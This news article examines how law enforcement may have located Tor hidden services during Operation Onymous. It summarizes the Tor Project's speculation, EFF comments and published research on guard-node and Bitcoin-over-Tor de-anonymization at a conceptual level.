In a blog post written on November 9, Tor Project director Andrew Lewman went over the possible ways that over 400 hidden services on dozens of servers were located by law enforcement during Operation Onymous. While some of the servers were related to criminal activity (such as Silk Road 2.0), at least some of the servers were not—including several that were acting as infrastructure for Tor’s anonymizing network. And the only answer Lewman could currently offer as to how the sites were exposed was “We don’t know.”

That's unnerving not just to people like the operators of the many illicit sites that were taken down by Operation Onymous, it’s also of concern to anyone using Tor to evade surveillance by more oppressive governments. Activists, dissidents, and journalists, for example, all rely on the same Tor infrastructure.

“If you are an activist or a journalist in these countries, your government thinks you are a criminal,” Eva Galperin, Global Policy Analyst for the Electronic Frontier Foundation, told Ars. “And you can learn a lot about good operational security practices by watching where criminals go wrong reading the affidavits on these cases, because your government is treating you as a criminal.”

Again, some of the sites taken down may not have been criminal at all. Doxbin, the hidden service that hosted “doxxes”—postings of personal information about individuals obtained in various ways—was seized the same day as Silk Road 2.0. However, it was not included in the sites listed in the Justice Department's filings thus far—something Galperin noted was “really weird.”

Additionally, four Tor exit nodes in Amsterdam and six in a Miami datacenter were taken offline during the joint operation by the FBI, Immigration and Customs Enforcement, and Europol member law enforcement organizations. One operator of a Tor relay—which the man ran from home—was reportedly raided by law enforcement agents. Ars has reached out to confirm the report but has not yet received a response from the individual.

Hacking the spew

There has been some speculation that law enforcement may have used a sort of denial of service attack crafted to break Tor’s Hidden Service code—the basis for “darknet” sites and services such as The Hidden Wiki, Silk Road, and Doxbin. However, the operator of Doxbin reported late yesterday that a large portion of what he thought may have been a denial of service attack in August was in fact probably caused by a darknet Web crawler. It’s also possible that some of the sites, such as Silk Road 2.0, were located through direct action by an undercover agent acting as a site administrator.

There may have been additional operational security issues that undid many of the sites, including possible collaboration with law enforcement by their hosting provider. “What’s interesting is that 129 of the hidden services taken down were using the same Bulgarian hosting provider,” Galperin said.

Lewman listed a number of possible ways the sites could have been exposed, including the lack of operational security that was part of the takedown of Silk Road. He suggested that SQL injection and remote file inclusion attacks could have been used against many of the sites, which were “quickly-coded e-shops with a big attack surface.”

There’s also the possibility that Bitcoins being passed through the sites were de-anonymized, based on research published in October by Ivan Pustogarov and Alex Biryukov of the University of Luxembourg that finds, “A low-resource attacker can gain full control of information flows between all users who chose to use Bitcoin over Tor,” the authors wrote. “In particular the attacker can link together user’s transactions regardless of pseudonyms used, control which Bitcoin blocks and transactions are relayed to the user and can delay or discard user’s transactions and blocks.”

According to Pustogarov and Biryukov, Tor makes it possible to conduct a man-in-the-middle attack against Bitcoin block transfers. Using the built-in denial of service attack prevention in the Bitcoin protocol, “an attacker is able to force specific Bitcoin peers to ban Tor Exit nodes of her choice,” they wrote. So by gaming the Bitcoin network’s reputation algorithm, someone could force all the Bitcoin traffic through exit nodes controlled by the attacker.

Breaking the network

Lewman noted that it’s possible law enforcement attacked the Tor network itself to make de-anonymization of the servers they targeted possible. On July 4, the Tor Project identified a group of Tor relays that were actively trying to break the anonymity of users by making changes to the Tor protocol headers associated with their traffic over the network.

The rogue relays were set up on January 30, 2014—just two weeks after Blake Benthall allegedly announced he had taken control of Silk Road 2.0 and shortly after the Homeland Security undercover officer who infiltrated Silk Road 2.0 began getting paid to be a site administrator. The relays not only could have de-anonymized some users, but they also “probably tried to learn who published hidden service descriptors, which would allow the attackers to learn the location of that hidden service,” Tor project leader Roger Dingledine wrote in a July 30 blog post.

Another potential weak point in the Tor network is what is known as a “guard attack.” In another research paper published by Pustogarov and Biryukov (with University of Luxembourg colleague Ralf-Phillip Weismann) for last year’s IEEE Symposium on Security and Privacy, the researchers found a method to reveal the “guard nodes” for specific hidden services. These are the connection points for darknet servers and the only systems on Tor that know the real IP address of those hidden servers. That knowledge, the researchers said, could be used for a “large-scale opportunistic de-anonymization attack capable of revealing IP addresses of a significant fraction of Tor’s hidden services over a one year period of time.”

By targeting a specific hidden service with a relatively low-powered network attack exploiting Tor’s Hidden Services Protocol, law enforcement agencies could have “destroyed” the Hidden Services Directory “lookup circuits” for those services and forced new connections to be made through Tor nodes controlled by law enforcement. Doing so would lead law enforcement to the guard node for a hidden service, allowing them to physically locate it and in turn (through monitoring the guard node) find the location of the hidden service itself.

Denial of service attacks against the hidden services could have a similar effect. If law enforcement configured a large enough set of relays over which they had control, a denial of service attack could have forced servers to switch to a new guard node (an exit point controlled by law enforcement, for example). In the process, the action would have exposed the location of those servers.